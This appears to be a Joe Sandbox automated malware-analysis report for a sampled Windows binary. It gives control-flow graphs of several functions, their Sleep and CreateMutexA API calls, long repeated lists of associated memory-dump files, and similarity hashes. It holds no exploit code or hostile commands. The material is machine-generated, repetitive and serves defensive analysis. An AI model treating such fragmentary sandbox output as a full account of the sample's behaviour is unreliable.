                                                                                                                                                                                                                                                              control_flow_graph 275 bca1ae-bca1ce 279 bca1fc-bca218 275->279 280 bca1d0-bca1dc 275->280 283 bca21a-bca226 279->283 284 bca246-bca265 279->284 281 bca1de-bca1ec 280->281 282 bca1f2-bca1f9 call bdd663 280->282 281->282 287 bca935 281->287 282->279 289 bca23c-bca243 call bdd663 283->289 290 bca228-bca236 283->290 285 bca267-bca273 284->285 286 bca293-bca916 call bd80c0 284->286 291 bca289-bca290 call bdd663 285->291 292 bca275-bca283 285->292 295 bca953-bca994 Sleep CreateMutexA 287->295 296 bca935 call bf6c6a 287->296 289->284 290->287 290->289 291->286 292->287 292->291 305 bca996-bca998 295->305 306 bca9a7-bca9a8 295->306 296->295 305->306 307 bca99a-bca9a5 305->307 307->306
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: c77eda46a99523ff1b9f062958ad6e98859cc55ee725768d29d76903b1e7e504
                                                                                                                                                                                                                                                              • Instruction ID: 702a79086d49fc5f85b05f11837b70926920b8b44b832580eef3fc5912a33f62
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c77eda46a99523ff1b9f062958ad6e98859cc55ee725768d29d76903b1e7e504
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 663128317002489FEB189B78DDCAF6DB7A2EBC6318F24429DE014AB3D5D77699808752

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 309 bca418-bca438 313 bca43a-bca446 309->313 314 bca466-bca482 309->314 315 bca45c-bca463 call bdd663 313->315 316 bca448-bca456 313->316 317 bca484-bca490 314->317 318 bca4b0-bca4cf 314->318 315->314 316->315 321 bca93f-bca949 call bf6c6a * 2 316->321 323 bca4a6-bca4ad call bdd663 317->323 324 bca492-bca4a0 317->324 319 bca4fd-bca916 call bd80c0 318->319 320 bca4d1-bca4dd 318->320 326 bca4df-bca4ed 320->326 327 bca4f3-bca4fa call bdd663 320->327 340 bca94e 321->340 341 bca949 call bf6c6a 321->341 323->318 324->321 324->323 326->321 326->327 327->319 342 bca953-bca994 Sleep CreateMutexA 340->342 343 bca94e call bf6c6a 340->343 341->340 345 bca996-bca998 342->345 346 bca9a7-bca9a8 342->346 343->342 345->346 347 bca99a-bca9a5 345->347 347->346
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                                              • Opcode ID: 2d73c9f3d83058fafa4e811ebcb5572194802ae408fef0d41216f8cfdbb56492
                                                                                                                                                                                                                                                              • Instruction ID: ea830377eafcc0309851fcf109626cc5e5992ba18cf64b26e64b0ca08f7f8580
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d73c9f3d83058fafa4e811ebcb5572194802ae408fef0d41216f8cfdbb56492
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 633128317001089BEB1CAB78DD8AF6DB7E2EFC6318F20829DE454973D5DBB599808652

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 349 bca54d-bca56d 353 bca56f-bca57b 349->353 354 bca59b-bca5b7 349->354 355 bca57d-bca58b 353->355 356 bca591-bca598 call bdd663 353->356 357 bca5b9-bca5c5 354->357 358 bca5e5-bca604 354->358 355->356 361 bca944-bca949 call bf6c6a 355->361 356->354 363 bca5db-bca5e2 call bdd663 357->363 364 bca5c7-bca5d5 357->364 359 bca606-bca612 358->359 360 bca632-bca916 call bd80c0 358->360 366 bca628-bca62f call bdd663 359->366 367 bca614-bca622 359->367 375 bca94e 361->375 376 bca949 call bf6c6a 361->376 363->358 364->361 364->363 366->360 367->361 367->366 379 bca953-bca994 Sleep CreateMutexA 375->379 380 bca94e call bf6c6a 375->380 376->375 383 bca996-bca998 379->383 384 bca9a7-bca9a8 379->384 380->379 383->384 385 bca99a-bca9a5 383->385 385->384
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
